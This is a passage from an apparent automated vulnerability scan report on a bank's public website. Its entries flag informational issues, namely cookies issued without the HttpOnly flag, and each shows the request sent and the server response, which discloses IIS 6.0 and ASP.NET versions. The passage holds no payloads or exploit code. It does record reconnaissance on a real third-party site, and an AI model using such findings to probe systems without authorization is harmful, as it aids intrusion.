Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 30469


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_objCommonHeader_mSe
...[SNIP]...

11.483. http://www.charterone.com/greensense/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /greensense/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /greensense/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:30 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <h
...[SNIP]...

11.484. http://www.charterone.com/home-equity/find-your-fit.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /home-equity/find-your-fit.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-equity/find-your-fit.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Feb 2011 22:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.charterone.com/home-equity/help-me-choose-home-equity.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0


11.485. http://www.charterone.com/home-equity/lines.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /home-equity/lines.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-equity/lines.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fhome-equity%2flines.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fhome-equity%252flines.aspx">here</a>.</h2>
</body></html>

11.486. http://www.charterone.com/home-equity/loans.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /home-equity/loans.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-equity/loans.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fhome-equity%2floans.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fhome-equity%252floans.aspx">here</a>.</h2>
</body></html>

11.487. http://www.charterone.com/investing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /investing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:22:53 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 44231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.488. http://www.charterone.com/loans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /loans/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:13:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2floans%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 184

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fdefault.aspx">here</a>.</h2>
</body></html>

11.489. http://www.charterone.com/loans/compare.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /loans/compare.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/compare.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:13:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2floans%2fcompare.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 184

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fcompare.aspx">here</a>.</h2>
</body></html>

11.490. http://www.charterone.com/loans/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /loans/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:13:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2floans%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 184

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fdefault.aspx">here</a>.</h2>
</body></html>

11.491. http://www.charterone.com/loans/home-equity.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /loans/home-equity.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/home-equity.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:13:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2floans%2fhome-equity.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fhome-equity.aspx">here</a>.</h2>
</body></html>

11.492. http://www.charterone.com/moneyhelp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /moneyhelp/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /moneyhelp/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:14:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:24:12 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.493. http://www.charterone.com/mortgages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /mortgages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fdefault.aspx">here</a>.</h2>
</body></html>

11.494. http://www.charterone.com/mortgages/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /mortgages/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fdefault.aspx">here</a>.</h2>
</body></html>

11.495. http://www.charterone.com/mortgages/home-refinance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /mortgages/home-refinance.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/home-refinance.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fhome-refinance.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fhome-refinance.aspx">here</a>.</h2>
</body></html>

11.496. http://www.charterone.com/mortgages/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /mortgages/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/overview.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 148

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx">here</a>.</h2>
</body></html>

11.497. http://www.charterone.com/online-banking/faq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /online-banking/faq.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online-banking/faq.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2ffaq.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 189

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252ffaq.aspx">here</a>.</h2>
</body></html>

11.498. http://www.charterone.com/online-banking/mobile-banking/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /online-banking/mobile-banking/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online-banking/mobile-banking/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2fmobile-banking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 212

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252fmobile-banking%252fdefault.aspx">here</a>.</h2>
</bo
...[SNIP]...

11.499. http://www.charterone.com/online-banking/olbdemo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /online-banking/olbdemo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online-banking/olbdemo.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2folbdemo.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 193

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252folbdemo.aspx">here</a>.</h2>
</body></html>

11.500. http://www.charterone.com/open-account.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /open-account.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /open-account.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fopen-account.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fopen-account.aspx">here</a>.</h2>
</body></html>

11.501. http://www.charterone.com/personal-investing/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /personal-investing/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal-investing/overview.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Feb 2011 22:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.charterone.com/personal-investing/default.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0


11.502. http://www.charterone.com/promotions/q1a/web.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /promotions/q1a/web.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /promotions/q1a/web.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: CampaignInfo=url%3d%2fpromotions%2fq1a%2fweb.aspx%3bdate%3d2%2f2%2f2011+12%3a00%3a00+AM%3bmeta%3dref%253d%253bpath%253d%252fpromotions%252fq1a%252fweb.aspx; expires=Mon, 01-Aug-2011 21:15:29 GMT; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:29 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 10578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   

<link rel="short
...[SNIP]...

11.503. http://www.charterone.com/savings-and-cds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /savings-and-cds/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 194

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fdefault.aspx">here</a>.</h2>
</body></html>

11.504. http://www.charterone.com/savings-and-cds/cds.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /savings-and-cds/cds.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/cds.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fcds.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
